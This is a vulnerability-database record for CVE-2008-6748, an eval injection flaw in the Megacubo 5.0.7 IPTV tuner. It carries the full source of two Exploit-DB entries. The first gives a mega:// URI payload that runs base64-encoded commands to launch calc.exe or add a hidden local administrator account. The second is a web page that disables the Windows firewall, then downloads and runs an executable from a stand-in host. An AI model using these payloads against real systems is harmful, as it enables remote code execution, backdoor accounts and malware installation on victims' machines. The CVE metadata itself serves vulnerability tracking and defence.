{"id": "CVE-2008-6748", "bulletinFamily": "NVD", "title": "CVE-2008-6748", "description": "Eval injection vulnerability in Megacubo 5.0.7 allows remote attackers to inject and execute arbitrary PHP code via the play action in a mega:// URI.", "published": "2009-04-24T14:30:00", "modified": "2018-10-11T20:57:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6748", "reporter": "cve@mitre.org", "references": ["http://retrogod.altervista.org/9sg_megacubo.html", "http://secunia.com/advisories/33326", "http://www.securityfocus.com/bid/33062", "http://www.securityfocus.com/archive/1/499654/100/0/threaded", "https://www.exploit-db.com/exploits/7623", "http://osvdb.org/51106", "https://exchange.xforce.ibmcloud.com/vulnerabilities/47697"], "cvelist": ["CVE-2008-6748"], "type": "cve", "lastseen": "2020-10-03T11:51:05", "edition": 3, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7630", "EDB-ID:7623"]}], "modified": "2020-10-03T11:51:05", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-10-03T11:51:05", "rev": 2}, "vulnersScore": 7.8}, "cpe": ["cpe:/a:megacubo:megacubo:5.0.7"], "affectedSoftware": [{"cpeName": "megacubo:megacubo", "name": "megacubo", "operator": "eq", "version": "5.0.7"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:megacubo:megacubo:5.0.7:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:megacubo:megacubo:5.0.7:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}

{"exploitdb": [{"lastseen": "2016-02-01T02:37:46", "description": "Megacubo 5.0.7 (mega://) Remote eval() Injection Exploit. CVE-2008-6748. Remote exploit for windows platform", "published": "2008-12-30T00:00:00", "type": "exploitdb", "title": "Megacubo 5.0.7 mega:// Remote eval Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6748"], "modified": "2008-12-30T00:00:00", "id": "EDB-ID:7623", "href": "https://www.exploit-db.com/exploits/7623/", "sourceData": "<!--\nMegacubo 5.0.7 (mega://) remote eval() injection exploit\nby Nine:Situations:Group::pyrokinesis\nsite: http://retrogod.altervista.org/\n\ntested against Internet Explorer 8 beta 2/xp sp 3\n\nsoftware site: http://www.megacubo.net/tv/\ndownload url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023\n\ndescription:\n\"Megacubo is a IPTV tuner application written in PHP + Winbinder.\nIt has a catalogue of links of TV streams which are available\nfor free in the web. At the moment it only runs on Windows(2000,\nXP and Vista).\"\n(note that it is among most downloaded apps on sourceforge, http://sourceforge.net/softwaremap/trove_list.php?form_cat=99)\n\nexplaination:\nit's possible to pass arbitrary php code to the \"play\" command\nof \"mega://\" uri handler which is further copied to the\nc:\\DATASTORE.txt temporary file and evaluated, note the \"con\"\nargument (which is a windows device name) to bypass a file_exists()\ncheck\n\nexample exploit, this run calc.exe:\n\nmega://play|con..\"a()\".system(base64_decode('Y21kIC9jIHN0YXJ0IGNhbGM=')).\"/?\");print(\n\nthe following one execute:\ncmd /c NET USER pyrokinesis pass /ADD && NET LOCALGROUP Administrators /ADD pyrokinesis\n-->\n\n<a href='mega://play|con..\"a()\".system(base64_decode(Y21kIC9jIE5FVCBVU0VSIHB5cm9raW5lc2lzIHBhc3MgL0FERCAmJiBORVQgTE9DQUxHUk9VUCBBZG1pbmlzdHJhdG9ycyAvQUREIHB5cm9raW5lc2lz)).\"/?\");print('>pwn</a>\n\n# milw0rm.com [2008-12-30]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7623/"}, {"lastseen": "2016-02-01T02:38:35", "description": "Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit. CVE-2008-6748. Remote exploit for windows platform", "published": "2009-01-01T00:00:00", "type": "exploitdb", "title": "Megacubo 5.0.7 mega:// Remote File Download and Execute Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6748"], "modified": "2009-01-01T00:00:00", "id": "EDB-ID:7630", "href": "https://www.exploit-db.com/exploits/7630/", "sourceData": "Megacubo 5.0.7 download & Execute\nby :JJunior\nsite: http://www.musicastop.com.br/\n\ntested against Internet Explorer 7 and Mozilla Firefox 1.5 Windows Xp sp 3\n\nsoftware site: http://www.megacubo.net/tv/\ndownload url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023\n \ndescription:\n\"Megacubo is a IPTV tuner application written in PHP + Winbinder.\nIt has a catalogue of links of TV streams which are available\nfor free in the web. At the moment it only runs on Windows(2000,\nXP and Vista).\"\n \nexample exploit, download & Execute :\n \n\n<html>\n<head>\n<title>MegaCubo - download & Execute</title>\n<meta http-equiv=\"Content-Type\" content=\"text/html; \">\n</head>\n<body>\n<script>\n// url download & exec code evil\nevil = 'http://www.example.com/evil.exe';\n \n// disable firewall encode base_64\nfirewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';\n \nshellcode = 'mega://play|con..\"a()\".system(base64_decode(\"'+firewall+'\")).fputs(fopen(\"c:/Megacubo.exe\",\"w\"),file_get_contents(\"'+evil+'\")).system(\"C:/Megacubo.exe\").\"/?\");print(';\n \n// shell code\nwindow.location=shellcode;\n\n</script>\n</body>\n</html>\n\n# milw0rm.com [2009-01-01]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7630/"}]}